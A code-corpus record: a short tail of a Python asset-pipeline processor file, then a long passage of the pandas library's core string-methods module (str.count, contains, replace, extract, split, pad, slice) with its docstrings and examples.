return CompressedJSNode("'{0}'".format(bundlename)).render(context)
class PipelineStylesheetProcessor(Processor):
def render(self, context, bundlename, config, processor_config):
from pipeline.templatetags.compressed import CompressedCSSNode
return CompressedCSSNode("'{0}'".format(bundlename)).render(context)
| bsd-2-clause | -5,160,865,482,003,992,000 | 35.494737 | 124 | 0.649841 | false |
kushalbhola/MyStuff | Practice/PythonApplication/env/Lib/site-packages/pandas/core/strings.py | 1 | 105891 | import codecs
from functools import wraps
import re
import textwrap
from typing import Dict, List
import warnings
import numpy as np
import pandas._libs.lib as lib
import pandas._libs.ops as libops
from pandas.util._decorators import Appender, deprecate_kwarg
from pandas.core.dtypes.common import (
ensure_object,
is_bool_dtype,
is_categorical_dtype,
is_integer,
is_list_like,
is_re,
is_scalar,
is_string_like,
)
from pandas.core.dtypes.generic import ABCIndexClass, ABCMultiIndex, ABCSeries
from pandas.core.dtypes.missing import isna
from pandas.core.algorithms import take_1d
from pandas.core.base import NoNewAttributesMixin
import pandas.core.common as com
_cpython_optimized_encoders = (
"utf-8",
"utf8",
"latin-1",
"latin1",
"iso-8859-1",
"mbcs",
"ascii",
)
_cpython_optimized_decoders = _cpython_optimized_encoders + ("utf-16", "utf-32")
_shared_docs = dict() # type: Dict[str, str]
def cat_core(list_of_columns: List, sep: str):
"""
Auxiliary function for :meth:`str.cat`
Parameters
----------
list_of_columns : list of numpy arrays
List of arrays to be concatenated with sep;
these arrays may not contain NaNs!
sep : string
The separator string for concatenating the columns
Returns
-------
nd.array
The concatenation of list_of_columns with sep
"""
list_with_sep = [sep] * (2 * len(list_of_columns) - 1)
list_with_sep[::2] = list_of_columns
return np.sum(list_with_sep, axis=0)
def cat_safe(list_of_columns: List, sep: str):
"""
Auxiliary function for :meth:`str.cat`.
Same signature as cat_core, but handles TypeErrors in concatenation, which
happen if the arrays in list_of columns have the wrong dtypes or content.
Parameters
----------
list_of_columns : list of numpy arrays
List of arrays to be concatenated with sep;
these arrays may not contain NaNs!
sep : string
The separator string for concatenating the columns
Returns
-------
nd.array
The concatenation of list_of_columns with sep
"""
try:
result = cat_core(list_of_columns, sep)
except TypeError:
# if there are any non-string values (wrong dtype or hidden behind
# object dtype), np.sum will fail; catch and return with better message
for column in list_of_columns:
dtype = lib.infer_dtype(column, skipna=True)
if dtype not in ["string", "empty"]:
raise TypeError(
"Concatenation requires list-likes containing only "
"strings (or missing values). Offending values found in "
"column {}".format(dtype)
) from None
return result
def _na_map(f, arr, na_result=np.nan, dtype=object):
# should really _check_ for NA
return _map(f, arr, na_mask=True, na_value=na_result, dtype=dtype)
def _map(f, arr, na_mask=False, na_value=np.nan, dtype=object):
if not len(arr):
return np.ndarray(0, dtype=dtype)
if isinstance(arr, ABCSeries):
arr = arr.values
if not isinstance(arr, np.ndarray):
arr = np.asarray(arr, dtype=object)
if na_mask:
mask = isna(arr)
try:
convert = not all(mask)
result = lib.map_infer_mask(arr, f, mask.view(np.uint8), convert)
except (TypeError, AttributeError) as e:
# Reraise the exception if callable `f` got wrong number of args.
# The user may want to be warned by this, instead of getting NaN
p_err = (
r"((takes)|(missing)) (?(2)from \d+ to )?\d+ "
r"(?(3)required )positional arguments?"
)
if len(e.args) >= 1 and re.search(p_err, e.args[0]):
raise e
def g(x):
try:
return f(x)
except (TypeError, AttributeError):
return na_value
return _map(g, arr, dtype=dtype)
if na_value is not np.nan:
np.putmask(result, mask, na_value)
if result.dtype == object:
result = lib.maybe_convert_objects(result)
return result
else:
return lib.map_infer(arr, f)
def str_count(arr, pat, flags=0):
"""
Count occurrences of pattern in each string of the Series/Index.
This function is used to count the number of times a particular regex
pattern is repeated in each of the string elements of the
:class:`~pandas.Series`.
Parameters
----------
pat : str
Valid regular expression.
flags : int, default 0, meaning no flags
Flags for the `re` module. For a complete list, `see here
<https://docs.python.org/3/howto/regex.html#compilation-flags>`_.
**kwargs
For compatibility with other string methods. Not used.
Returns
-------
Series or Index
Same type as the calling object containing the integer counts.
See Also
--------
re : Standard library module for regular expressions.
str.count : Standard library version, without regular expression support.
Notes
-----
Some characters need to be escaped when passing in `pat`.
eg. ``'$'`` has a special meaning in regex and must be escaped when
finding this literal character.
Examples
--------
>>> s = pd.Series(['A', 'B', 'Aaba', 'Baca', np.nan, 'CABA', 'cat'])
>>> s.str.count('a')
0 0.0
1 0.0
2 2.0
3 2.0
4 NaN
5 0.0
6 1.0
dtype: float64
Escape ``'$'`` to find the literal dollar sign.
>>> s = pd.Series(['$', 'B', 'Aab$', '$$ca', 'C$B$', 'cat'])
>>> s.str.count('\\$')
0 1
1 0
2 1
3 2
4 2
5 0
dtype: int64
This is also available on Index
>>> pd.Index(['A', 'A', 'Aaba', 'cat']).str.count('a')
Int64Index([0, 0, 2, 1], dtype='int64')
"""
regex = re.compile(pat, flags=flags)
f = lambda x: len(regex.findall(x))
return _na_map(f, arr, dtype=int)
def str_contains(arr, pat, case=True, flags=0, na=np.nan, regex=True):
"""
Test if pattern or regex is contained within a string of a Series or Index.
Return boolean Series or Index based on whether a given pattern or regex is
contained within a string of a Series or Index.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
Flags to pass through to the re module, e.g. re.IGNORECASE.
na : default NaN
Fill value for missing values.
regex : bool, default True
If True, assumes the pat is a regular expression.
If False, treats the pat as a literal string.
Returns
-------
Series or Index of boolean values
A Series or Index of boolean values indicating whether the
given pattern is contained within the string of each element
of the Series or Index.
See Also
--------
match : Analogous, but stricter, relying on re.match instead of re.search.
Series.str.startswith : Test if the start of each string element matches a
pattern.
Series.str.endswith : Same as startswith, but tests the end of string.
Examples
--------
Returning a Series of booleans using only a literal pattern.
>>> s1 = pd.Series(['Mouse', 'dog', 'house and parrot', '23', np.NaN])
>>> s1.str.contains('og', regex=False)
0 False
1 True
2 False
3 False
4 NaN
dtype: object
Returning an Index of booleans using only a literal pattern.
>>> ind = pd.Index(['Mouse', 'dog', 'house and parrot', '23.0', np.NaN])
>>> ind.str.contains('23', regex=False)
Index([False, False, False, True, nan], dtype='object')
Specifying case sensitivity using `case`.
>>> s1.str.contains('oG', case=True, regex=True)
0 False
1 False
2 False
3 False
4 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN` replaces NaN values
with `False`. If Series or Index does not contain NaN values
the resultant dtype will be `bool`, otherwise, an `object` dtype.
>>> s1.str.contains('og', na=False, regex=True)
0 False
1 True
2 False
3 False
4 False
dtype: bool
Returning 'house' or 'dog' when either expression occurs in a string.
>>> s1.str.contains('house|dog', regex=True)
0 False
1 True
2 True
3 False
4 NaN
dtype: object
Ignoring case sensitivity using `flags` with regex.
>>> import re
>>> s1.str.contains('PARROT', flags=re.IGNORECASE, regex=True)
0 False
1 False
2 True
3 False
4 NaN
dtype: object
Returning any digit using regular expression.
>>> s1.str.contains('\\d', regex=True)
0 False
1 False
2 False
3 True
4 NaN
dtype: object
Ensure `pat` is a not a literal pattern when `regex` is set to True.
Note in the following example one might expect only `s2[1]` and `s2[3]` to
return `True`. However, '.0' as a regex matches any character
followed by a 0.
>>> s2 = pd.Series(['40', '40.0', '41', '41.0', '35'])
>>> s2.str.contains('.0', regex=True)
0 True
1 True
2 False
3 True
4 False
dtype: bool
"""
if regex:
if not case:
flags |= re.IGNORECASE
regex = re.compile(pat, flags=flags)
if regex.groups > 0:
warnings.warn(
"This pattern has match groups. To actually get the"
" groups, use str.extract.",
UserWarning,
stacklevel=3,
)
f = lambda x: bool(regex.search(x))
else:
if case:
f = lambda x: pat in x
else:
upper_pat = pat.upper()
f = lambda x: upper_pat in x
uppered = _na_map(lambda x: x.upper(), arr)
return _na_map(f, uppered, na, dtype=bool)
return _na_map(f, arr, na, dtype=bool)
def str_startswith(arr, pat, na=np.nan):
"""
Test if the start of each string element matches a pattern.
Equivalent to :meth:`str.startswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the start of each string element.
See Also
--------
str.startswith : Python standard library string method.
Series.str.endswith : Same as startswith, but tests the end of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'Bear', 'cat', np.nan])
>>> s
0 bat
1 Bear
2 cat
3 NaN
dtype: object
>>> s.str.startswith('b')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.startswith('b', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
f = lambda x: x.startswith(pat)
return _na_map(f, arr, na, dtype=bool)
def str_endswith(arr, pat, na=np.nan):
"""
Test if the end of each string element matches a pattern.
Equivalent to :meth:`str.endswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the end of each string element.
See Also
--------
str.endswith : Python standard library string method.
Series.str.startswith : Same as endswith, but tests the start of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'bear', 'caT', np.nan])
>>> s
0 bat
1 bear
2 caT
3 NaN
dtype: object
>>> s.str.endswith('t')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.endswith('t', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
f = lambda x: x.endswith(pat)
return _na_map(f, arr, na, dtype=bool)
def str_replace(arr, pat, repl, n=-1, case=None, flags=0, regex=True):
r"""
Replace occurrences of pattern/regex in the Series/Index with
some other string. Equivalent to :meth:`str.replace` or
:func:`re.sub`.
Parameters
----------
pat : str or compiled regex
String can be a character sequence or regular expression.
.. versionadded:: 0.20.0
`pat` also accepts a compiled regex.
repl : str or callable
Replacement string or a callable. The callable is passed the regex
match object and must return a replacement string to be used.
See :func:`re.sub`.
.. versionadded:: 0.20.0
`repl` also accepts a callable.
n : int, default -1 (all)
Number of replacements to make from start.
case : bool, default None
- If True, case sensitive (the default if `pat` is a string)
- Set to False for case insensitive
- Cannot be set if `pat` is a compiled regex
flags : int, default 0 (no flags)
- re module flags, e.g. re.IGNORECASE
- Cannot be set if `pat` is a compiled regex
regex : bool, default True
- If True, assumes the passed-in pattern is a regular expression.
- If False, treats the pattern as a literal string
- Cannot be set to False if `pat` is a compiled regex or `repl` is
a callable.
.. versionadded:: 0.23.0
Returns
-------
Series or Index of object
A copy of the object with all matching occurrences of `pat` replaced by
`repl`.
Raises
------
ValueError
* if `regex` is False and `repl` is a callable or `pat` is a compiled
regex
* if `pat` is a compiled regex and `case` or `flags` is set
Notes
-----
When `pat` is a compiled regex, all flags should be included in the
compiled regex. Use of `case`, `flags`, or `regex=False` with a compiled
regex will raise an error.
Examples
--------
When `pat` is a string and `regex` is True (the default), the given `pat`
is compiled as a regex. When `repl` is a string, it replaces matching
regex patterns as with :meth:`re.sub`. NaN value(s) in the Series are
left as is:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f.', 'ba', regex=True)
0 bao
1 baz
2 NaN
dtype: object
When `pat` is a string and `regex` is False, every `pat` is replaced with
`repl` as with :meth:`str.replace`:
>>> pd.Series(['f.o', 'fuz', np.nan]).str.replace('f.', 'ba', regex=False)
0 bao
1 fuz
2 NaN
dtype: object
When `repl` is a callable, it is called on every `pat` using
:func:`re.sub`. The callable should expect one positional argument
(a regex object) and return a string.
To get the idea:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f', repr)
0 <_sre.SRE_Match object; span=(0, 1), match='f'>oo
1 <_sre.SRE_Match object; span=(0, 1), match='f'>uz
2 NaN
dtype: object
Reverse every lowercase alphabetic word:
>>> repl = lambda m: m.group(0)[::-1]
>>> pd.Series(['foo 123', 'bar baz', np.nan]).str.replace(r'[a-z]+', repl)
0 oof 123
1 rab zab
2 NaN
dtype: object
Using regex groups (extract second group and swap case):
>>> pat = r"(?P<one>\w+) (?P<two>\w+) (?P<three>\w+)"
>>> repl = lambda m: m.group('two').swapcase()
>>> pd.Series(['One Two Three', 'Foo Bar Baz']).str.replace(pat, repl)
0 tWO
1 bAR
dtype: object
Using a compiled regex with flags
>>> import re
>>> regex_pat = re.compile(r'FUZ', flags=re.IGNORECASE)
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace(regex_pat, 'bar')
0 foo
1 bar
2 NaN
dtype: object
"""
# Check whether repl is valid (GH 13438, GH 15055)
if not (is_string_like(repl) or callable(repl)):
raise TypeError("repl must be a string or callable")
is_compiled_re = is_re(pat)
if regex:
if is_compiled_re:
if (case is not None) or (flags != 0):
raise ValueError(
"case and flags cannot be set" " when pat is a compiled regex"
)
else:
# not a compiled regex
# set default case
if case is None:
case = True
# add case flag, if provided
if case is False:
flags |= re.IGNORECASE
if is_compiled_re or len(pat) > 1 or flags or callable(repl):
n = n if n >= 0 else 0
compiled = re.compile(pat, flags=flags)
f = lambda x: compiled.sub(repl=repl, string=x, count=n)
else:
f = lambda x: x.replace(pat, repl, n)
else:
if is_compiled_re:
raise ValueError(
"Cannot use a compiled regex as replacement " "pattern with regex=False"
)
if callable(repl):
raise ValueError("Cannot use a callable replacement when " "regex=False")
f = lambda x: x.replace(pat, repl, n)
return _na_map(f, arr)
def str_repeat(arr, repeats):
"""
Duplicate each string in the Series or Index.
Parameters
----------
repeats : int or sequence of int
Same value for all (int) or different value per (sequence).
Returns
-------
Series or Index of object
Series or Index of repeated string objects specified by
input parameter repeats.
Examples
--------
>>> s = pd.Series(['a', 'b', 'c'])
>>> s
0 a
1 b
2 c
dtype: object
Single int repeats string in Series
>>> s.str.repeat(repeats=2)
0 aa
1 bb
2 cc
dtype: object
Sequence of int repeats corresponding string in Series
>>> s.str.repeat(repeats=[1, 2, 3])
0 a
1 bb
2 ccc
dtype: object
"""
if is_scalar(repeats):
def scalar_rep(x):
try:
return bytes.__mul__(x, repeats)
except TypeError:
return str.__mul__(x, repeats)
return _na_map(scalar_rep, arr)
else:
def rep(x, r):
try:
return bytes.__mul__(x, r)
except TypeError:
return str.__mul__(x, r)
repeats = np.asarray(repeats, dtype=object)
result = libops.vec_binop(com.values_from_object(arr), repeats, rep)
return result
def str_match(arr, pat, case=True, flags=0, na=np.nan):
"""
Determine if each string matches a regular expression.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
re module flags, e.g. re.IGNORECASE.
na : default NaN
Fill value for missing values.
Returns
-------
Series/array of boolean values
See Also
--------
contains : Analogous, but less strict, relying on re.search instead of
re.match.
extract : Extract matched groups.
"""
if not case:
flags |= re.IGNORECASE
regex = re.compile(pat, flags=flags)
dtype = bool
f = lambda x: bool(regex.match(x))
return _na_map(f, arr, na, dtype=dtype)
def _get_single_group_name(rx):
try:
return list(rx.groupindex.keys()).pop()
except IndexError:
return None
def _groups_or_na_fun(regex):
"""Used in both extract_noexpand and extract_frame"""
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
empty_row = [np.nan] * regex.groups
def f(x):
if not isinstance(x, str):
return empty_row
m = regex.search(x)
if m:
return [np.nan if item is None else item for item in m.groups()]
else:
return empty_row
return f
def _str_extract_noexpand(arr, pat, flags=0):
"""
Find groups in each string in the Series using passed regular
expression. This function is called from
str_extract(expand=False), and can return Series, DataFrame, or
Index.
"""
from pandas import DataFrame, Index
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
if regex.groups == 1:
result = np.array([groups_or_na(val)[0] for val in arr], dtype=object)
name = _get_single_group_name(regex)
else:
if isinstance(arr, Index):
raise ValueError("only one regex group is supported with Index")
name = None
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if arr.empty:
result = DataFrame(columns=columns, dtype=object)
else:
result = DataFrame(
[groups_or_na(val) for val in arr],
columns=columns,
index=arr.index,
dtype=object,
)
return result, name
def _str_extract_frame(arr, pat, flags=0):
"""
For each subject string in the Series, extract groups from the
first match of regular expression pat. This function is called from
str_extract(expand=True), and always returns a DataFrame.
"""
from pandas import DataFrame
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if len(arr) == 0:
return DataFrame(columns=columns, dtype=object)
try:
result_index = arr.index
except AttributeError:
result_index = None
return DataFrame(
[groups_or_na(val) for val in arr],
columns=columns,
index=result_index,
dtype=object,
)
def str_extract(arr, pat, flags=0, expand=True):
r"""
Extract capture groups in the regex `pat` as columns in a DataFrame.
For each subject string in the Series, extract groups from the
first match of regular expression `pat`.
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
Flags from the ``re`` module, e.g. ``re.IGNORECASE``, that
modify regular expression matching for things like case,
spaces, etc. For more details, see :mod:`re`.
expand : bool, default True
If True, return DataFrame with one column per capture group.
If False, return a Series/Index if there is one capture group
or DataFrame if there are multiple capture groups.
.. versionadded:: 0.18.0
Returns
-------
DataFrame or Series or Index
A DataFrame with one row for each subject string, and one
column for each group. Any capture group names in regular
expression pat will be used for column names; otherwise
capture group numbers will be used. The dtype of each result
column is always object, even when no match is found. If
``expand=False`` and pat has only one capture group, then
return a Series (if subject is a Series) or Index (if subject
is an Index).
See Also
--------
extractall : Returns all matches (not just the first match).
Examples
--------
A pattern with two groups will return a DataFrame with two columns.
Non-matches will be NaN.
>>> s = pd.Series(['a1', 'b2', 'c3'])
>>> s.str.extract(r'([ab])(\d)')
0 1
0 a 1
1 b 2
2 NaN NaN
A pattern may contain optional groups.
>>> s.str.extract(r'([ab])?(\d)')
0 1
0 a 1
1 b 2
2 NaN 3
Named groups will become column names in the result.
>>> s.str.extract(r'(?P<letter>[ab])(?P<digit>\d)')
letter digit
0 a 1
1 b 2
2 NaN NaN
A pattern with one group will return a DataFrame with one column
if expand=True.
>>> s.str.extract(r'[ab](\d)', expand=True)
0
0 1
1 2
2 NaN
A pattern with one group will return a Series if expand=False.
>>> s.str.extract(r'[ab](\d)', expand=False)
0 1
1 2
2 NaN
dtype: object
"""
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand:
return _str_extract_frame(arr._orig, pat, flags=flags)
else:
result, name = _str_extract_noexpand(arr._parent, pat, flags=flags)
return arr._wrap_result(result, name=name, expand=expand)
def str_extractall(arr, pat, flags=0):
r"""
For each subject string in the Series, extract groups from all
matches of regular expression pat. When each subject string in the
Series has exactly one match, extractall(pat).xs(0, level='match')
is the same as extract(pat).
.. versionadded:: 0.18.0
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
A ``re`` module flag, for example ``re.IGNORECASE``. These allow
to modify regular expression matching for things like case, spaces,
etc. Multiple flags can be combined with the bitwise OR operator,
for example ``re.IGNORECASE | re.MULTILINE``.
Returns
-------
DataFrame
A ``DataFrame`` with one row for each match, and one column for each
group. Its rows have a ``MultiIndex`` with first levels that come from
the subject ``Series``. The last level is named 'match' and indexes the
matches in each item of the ``Series``. Any capture group names in
regular expression pat will be used for column names; otherwise capture
group numbers will be used.
See Also
--------
extract : Returns first match only (not all matches).
Examples
--------
A pattern with one group will return a DataFrame with one column.
Indices with no matches will not appear in the result.
>>> s = pd.Series(["a1a2", "b1", "c1"], index=["A", "B", "C"])
>>> s.str.extractall(r"[ab](\d)")
0
match
A 0 1
1 2
B 0 1
Capture group names are used for column names of the result.
>>> s.str.extractall(r"[ab](?P<digit>\d)")
digit
match
A 0 1
1 2
B 0 1
A pattern with two groups will return a DataFrame with two columns.
>>> s.str.extractall(r"(?P<letter>[ab])(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
Optional groups that do not match are NaN in the result.
>>> s.str.extractall(r"(?P<letter>[ab])?(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
C 0 NaN 1
"""
regex = re.compile(pat, flags=flags)
# the regex must contain capture groups.
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
if isinstance(arr, ABCIndexClass):
arr = arr.to_series().reset_index(drop=True)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
match_list = []
index_list = []
is_mi = arr.index.nlevels > 1
for subject_key, subject in arr.items():
if isinstance(subject, str):
if not is_mi:
subject_key = (subject_key,)
for match_i, match_tuple in enumerate(regex.findall(subject)):
if isinstance(match_tuple, str):
match_tuple = (match_tuple,)
na_tuple = [np.NaN if group == "" else group for group in match_tuple]
match_list.append(na_tuple)
result_key = tuple(subject_key + (match_i,))
index_list.append(result_key)
from pandas import MultiIndex
index = MultiIndex.from_tuples(index_list, names=arr.index.names + ["match"])
result = arr._constructor_expanddim(match_list, index=index, columns=columns)
return result
def str_get_dummies(arr, sep="|"):
"""
Split each string in the Series by sep and return a DataFrame
of dummy/indicator variables.
Parameters
----------
sep : str, default "|"
String to split on.
Returns
-------
DataFrame
Dummy variables corresponding to values of the Series.
See Also
--------
get_dummies : Convert categorical variable into dummy/indicator
variables.
Examples
--------
>>> pd.Series(['a|b', 'a', 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 1 0 0
2 1 0 1
>>> pd.Series(['a|b', np.nan, 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 0 0 0
2 1 0 1
"""
arr = arr.fillna("")
try:
arr = sep + arr + sep
except TypeError:
arr = sep + arr.astype(str) + sep
tags = set()
for ts in arr.str.split(sep):
tags.update(ts)
tags = sorted(tags - {""})
dummies = np.empty((len(arr), len(tags)), dtype=np.int64)
for i, t in enumerate(tags):
pat = sep + t + sep
dummies[:, i] = lib.map_infer(arr.values, lambda x: pat in x)
return dummies, tags
def str_join(arr, sep):
"""
Join lists contained as elements in the Series/Index with passed delimiter.
If the elements of a Series are lists themselves, join the content of these
lists using the delimiter passed to the function.
This function is an equivalent to :meth:`str.join`.
Parameters
----------
sep : str
Delimiter to use between list entries.
Returns
-------
Series/Index: object
The list entries concatenated by intervening occurrences of the
delimiter.
Raises
------
AttributeError
If the supplied Series contains neither strings nor lists.
See Also
--------
str.join : Standard library version of this method.
Series.str.split : Split strings around given separator/delimiter.
Notes
-----
If any of the list items is not a string object, the result of the join
will be `NaN`.
Examples
--------
Example with a list that contains non-string elements.
>>> s = pd.Series([['lion', 'elephant', 'zebra'],
... [1.1, 2.2, 3.3],
... ['cat', np.nan, 'dog'],
... ['cow', 4.5, 'goat'],
... ['duck', ['swan', 'fish'], 'guppy']])
>>> s
0 [lion, elephant, zebra]
1 [1.1, 2.2, 3.3]
2 [cat, nan, dog]
3 [cow, 4.5, goat]
4 [duck, [swan, fish], guppy]
dtype: object
Join all lists using a '-'. The lists containing object(s) of types other
than str will produce a NaN.
>>> s.str.join('-')
0 lion-elephant-zebra
1 NaN
2 NaN
3 NaN
4 NaN
dtype: object
"""
return _na_map(sep.join, arr)
def str_findall(arr, pat, flags=0):
"""
Find all occurrences of pattern or regular expression in the Series/Index.
Equivalent to applying :func:`re.findall` to all the elements in the
Series/Index.
Parameters
----------
pat : str
Pattern or regular expression.
flags : int, default 0
Flags from ``re`` module, e.g. `re.IGNORECASE` (default is 0, which
means no flags).
Returns
-------
Series/Index of lists of strings
All non-overlapping matches of pattern or regular expression in each
string of this Series/Index.
See Also
--------
count : Count occurrences of pattern or regular expression in each string
of the Series/Index.
extractall : For each string in the Series, extract groups from all matches
of regular expression and return a DataFrame with one row for each
match and one column for each group.
re.findall : The equivalent ``re`` function to all non-overlapping matches
of pattern or regular expression in string, as a list of strings.
Examples
--------
>>> s = pd.Series(['Lion', 'Monkey', 'Rabbit'])
The search for the pattern 'Monkey' returns one match:
>>> s.str.findall('Monkey')
0 []
1 [Monkey]
2 []
dtype: object
On the other hand, the search for the pattern 'MONKEY' doesn't return any
match:
>>> s.str.findall('MONKEY')
0 []
1 []
2 []
dtype: object
Flags can be added to the pattern or regular expression. For instance,
to find the pattern 'MONKEY' ignoring the case:
>>> import re
>>> s.str.findall('MONKEY', flags=re.IGNORECASE)
0 []
1 [Monkey]
2 []
dtype: object
When the pattern matches more than one string in the Series, all matches
are returned:
>>> s.str.findall('on')
0 [on]
1 [on]
2 []
dtype: object
Regular expressions are supported too. For instance, the search for all the
strings ending with the word 'on' is shown next:
>>> s.str.findall('on$')
0 [on]
1 []
2 []
dtype: object
If the pattern is found more than once in the same string, then a list of
multiple strings is returned:
>>> s.str.findall('b')
0 []
1 []
2 [b, b]
dtype: object
"""
regex = re.compile(pat, flags=flags)
return _na_map(regex.findall, arr)
def str_find(arr, sub, start=0, end=None, side="left"):
"""
Return indexes in each strings in the Series/Index where the
substring is fully contained between [start:end]. Return -1 on failure.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
side : {'left', 'right'}, default 'left'
Specifies a starting side, equivalent to ``find`` or ``rfind``.
Returns
-------
Series or Index
Indexes where substring is found.
"""
if not isinstance(sub, str):
msg = "expected a string object, not {0}"
raise TypeError(msg.format(type(sub).__name__))
if side == "left":
method = "find"
elif side == "right":
method = "rfind"
else: # pragma: no cover
raise ValueError("Invalid side")
if end is None:
f = lambda x: getattr(x, method)(sub, start)
else:
f = lambda x: getattr(x, method)(sub, start, end)
return _na_map(f, arr, dtype=int)
def str_index(arr, sub, start=0, end=None, side="left"):
if not isinstance(sub, str):
msg = "expected a string object, not {0}"
raise TypeError(msg.format(type(sub).__name__))
if side == "left":
method = "index"
elif side == "right":
method = "rindex"
else: # pragma: no cover
raise ValueError("Invalid side")
if end is None:
f = lambda x: getattr(x, method)(sub, start)
else:
f = lambda x: getattr(x, method)(sub, start, end)
return _na_map(f, arr, dtype=int)
def str_pad(arr, width, side="left", fillchar=" "):
"""
Pad strings in the Series/Index up to width.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with character defined in `fillchar`.
side : {'left', 'right', 'both'}, default 'left'
Side from which to fill resulting string.
fillchar : str, default ' '
Additional character for filling, default is whitespace.
Returns
-------
Series or Index of object
Returns Series or Index with minimum number of char in object.
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='left')``.
Series.str.ljust : Fills the right side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='right')``.
Series.str.center : Fills boths sides of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='both')``.
Series.str.zfill : Pad strings in the Series/Index by prepending '0'
character. Equivalent to ``Series.str.pad(side='left', fillchar='0')``.
Examples
--------
>>> s = pd.Series(["caribou", "tiger"])
>>> s
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10)
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10, side='right', fillchar='-')
0 caribou---
1 tiger-----
dtype: object
>>> s.str.pad(width=10, side='both', fillchar='-')
0 -caribou--
1 --tiger---
dtype: object
"""
if not isinstance(fillchar, str):
msg = "fillchar must be a character, not {0}"
raise TypeError(msg.format(type(fillchar).__name__))
if len(fillchar) != 1:
raise TypeError("fillchar must be a character, not str")
if not is_integer(width):
msg = "width must be of integer type, not {0}"
raise TypeError(msg.format(type(width).__name__))
if side == "left":
f = lambda x: x.rjust(width, fillchar)
elif side == "right":
f = lambda x: x.ljust(width, fillchar)
elif side == "both":
f = lambda x: x.center(width, fillchar)
else: # pragma: no cover
raise ValueError("Invalid side")
return _na_map(f, arr)
def str_split(arr, pat=None, n=None):
if pat is None:
if n is None or n == 0:
n = -1
f = lambda x: x.split(pat, n)
else:
if len(pat) == 1:
if n is None or n == 0:
n = -1
f = lambda x: x.split(pat, n)
else:
if n is None or n == -1:
n = 0
regex = re.compile(pat)
f = lambda x: regex.split(x, maxsplit=n)
res = _na_map(f, arr)
return res
def str_rsplit(arr, pat=None, n=None):
if n is None or n == 0:
n = -1
f = lambda x: x.rsplit(pat, n)
res = _na_map(f, arr)
return res
def str_slice(arr, start=None, stop=None, step=None):
"""
Slice substrings from each element in the Series or Index.
Parameters
----------
start : int, optional
Start position for slice operation.
stop : int, optional
Stop position for slice operation.
step : int, optional
Step size for slice operation.
Returns
-------
Series or Index of object
Series or Index from sliced substring from original string object.
See Also
--------
Series.str.slice_replace : Replace a slice with a string.
Series.str.get : Return element at position.
Equivalent to `Series.str.slice(start=i, stop=i+1)` with `i`
being the position.
Examples
--------
>>> s = pd.Series(["koala", "fox", "chameleon"])
>>> s
0 koala
1 fox
2 chameleon
dtype: object
>>> s.str.slice(start=1)
0 oala
1 ox
2 hameleon
dtype: object
>>> s.str.slice(stop=2)
0 ko
1 fo
2 ch
dtype: object
>>> s.str.slice(step=2)
0 kaa
1 fx
2 caeen
dtype: object
>>> s.str.slice(start=0, stop=5, step=3)
0 kl
1 f
2 cm
dtype: object
Equivalent behaviour to:
>>> s.str[0:5:3]
0 kl
1 f
2 cm
dtype: object
"""
obj = slice(start, stop, step)
f = lambda x: x[obj]
return _na_map(f, arr)
def str_slice_replace(arr, start=None, stop=None, repl=None):
"""
Replace a positional slice of a string with another value.
Parameters
----------
start : int, optional
Left index position to use for the slice. If not specified (None),
the slice is unbounded on the left, i.e. slice from the start
of the string.
stop : int, optional
Right index position to use for the slice. If not specified (None),
the slice is unbounded on the right, i.e. slice until the
end of the string.
repl : str, optional
String for replacement. If not specified (None), the sliced region
is replaced with an empty string.
Returns
-------
Series or Index
Same type as the original object.
See Also
--------
Series.str.slice : Just slicing without replacement.
Examples
--------
>>> s = pd.Series(['a', 'ab', 'abc', 'abdc', 'abcde'])
>>> s
0 a
1 ab
2 abc
3 abdc
4 abcde
dtype: object
Specify just `start`, meaning replace `start` until the end of the
string with `repl`.
>>> s.str.slice_replace(1, repl='X')
0 aX
1 aX
2 aX
